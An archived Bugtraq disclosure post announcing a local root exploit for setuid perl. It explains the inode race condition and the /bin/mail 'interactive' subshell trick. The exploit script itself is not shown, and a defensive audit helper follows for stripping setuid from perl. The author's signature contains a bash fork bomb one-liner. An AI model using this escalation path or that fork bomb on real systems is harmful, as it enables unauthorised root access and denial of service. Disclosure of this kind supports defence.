Date: Sat, 5 Aug 2000 18:39:22 +0200
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
Subject: sperl 5.00503 (and newer ;) exploit
To: BUGTRAQ@SECURITYFOCUS.COM

Not much to say (except I feel a little bit stupid posting it)... This exploit gives instant root, at least on the RedHat 6.x/7.0 Linux boxes I have available for tests... And for sure, all other systems are vulnerable as well - it's just that maybe this code will need some refining / tuning / minor changes...

Below you'll find a brief description of the vulnerability and the exploit itself, written by me. Please note - I didn't develop everything by myself; I got great support from Sebastian Krahmer - see the development history. I still pray he won't get angry at me (probably he will) - but he should be listed first any time you're talking about this vulnerability (he made me think with his findings :P).

I don't know who should be blamed - perl vendors? /bin/mail vendors for putting in undocumented (at least on the manpage) features? Hmm... I guess it's nobody's fault ;)

Requires: +s perl; bash, gcc, make, usleep (yup, usleep; it's not available on every system, but I have no time to rewrite everything in C; you can grab this code from the RedHat distro or so) will be good... Don't mail me if you can't use it - it works. And now, some reading.

#
#    -- PLEASE READ THESE COMMENTS CAREFULLY BEFORE TRYING ANYTHING --
#
# Wonderful, lovely, world-smashing, exciting perl exploit. It works against
# +s suidperl, exploiting an undocumented /bin/mail feature when perl wants to
# notify root on inode race conditions. Currently tested under RH Linux.
#
# What's probably most shocking, the buggy code has the following comment inside:
# /* heh, heh */. I guess the author wasn't laughing last.
#
# The development history of this exploit is really funny. I found this condition
# about 4 months ago, but thought it was useless (who wants to notify root?).
# I deleted my test code and didn't leave any notes on it. Then, a month after
# this discovery, Sebastian contacted me. He was working on a perl exploit.
# He told me he didn't know how to cause this condition to happen, but if only
# he realised how it could be done, he'd be able to use an undocumented /bin/mail
# feature - the environment variable 'interactive', which, if set, causes
# /bin/mail to interpret ~! commands (subshell requests) even if stdin is not
# on a terminal. And then I understood what I'd done. I spent the next month
# (yes! no kidding!) trying to recall WHAT THE FSCK was the condition. I
# remembered it was trivial, even annoying... And finally, now I'm able to
# reconstruct it.
#
# This exploit tries to fit in a rather short, but reasonable time window in
# order to exploit the bug. I tested it on a fast, not overloaded Linux box, and
# I guess on slow machines it needs tuning. It needs anything setuid
# (/usr/bin/passwd is just fine), a writable working directory and something
# around 4 minutes. The working directory should be mounted without noexec or
# nosuid options (if so, find something like /var/lib/svgalib etc).
#
# WARNING: On slow machines, it's quite possible this exploit will cause
# heavy load. Please test it when the system is not overloaded and not used
# (eg. at night).
#
# I'd like to thank Sebastian Krahmer for his help (in fact, HE discovered it
# - I think I can say it without shame), and especially thank several of
# my braincells that survived monitor radiation and made me recall this
# race condition.
#
# Send comments, ideas and flames to <lcamtuf@ids.pl>
# Tested with sperl 5.00503, but should work with any other as well.
#
# Good luck and don't abuse it.
#

_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

Attachment: xperl.sh (Content-Type: APPLICATION/x-sh, base64-encoded)
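The post states that the attack needs a setuid perl ("Requires: +s perl"), so the practical mitigation on an unpatched box is to find setuid perl interpreters and strip the bit. The helper below is an added example for that audit, not part of the original post or its attachment; the search root, the name patterns (sperl*, suidperl*, perl*) and the function names are assumptions.

```shell
#!/bin/sh
# Added audit helper (not from the original post): locate setuid perl
# interpreters, the precondition the post names, and clear the setuid bit.
# Name patterns and the search root are assumptions; adjust for your system.

# List regular files under $1 that carry the setuid bit and look like a perl
# interpreter. Stays on one filesystem (-xdev); prints one path per line.
find_setuid_perl() {
  find "$1" -xdev -type f -perm -4000 \
    \( -name 'sperl*' -o -name 'suidperl*' -o -name 'perl*' \) 2>/dev/null
}

# Clear the setuid bit on every file found by find_setuid_perl. Without +s,
# perl no longer runs with root privileges, so the /bin/mail notification
# path the post describes cannot yield a root shell.
strip_setuid_perl() {
  find_setuid_perl "$1" | while IFS= read -r f; do
    chmod u-s "$f" && echo "cleared setuid on $f"
  done
}

# Exit status 0 when no setuid perl remains under $1, non-zero otherwise;
# suitable for a cron or configuration-management compliance check.
setuid_perl_clean() {
  [ -z "$(find_setuid_perl "$1")" ]
}
```

Run it as `find_setuid_perl /usr` to audit, `strip_setuid_perl /usr` to remediate, and `setuid_perl_clean /usr` as a pass/fail check.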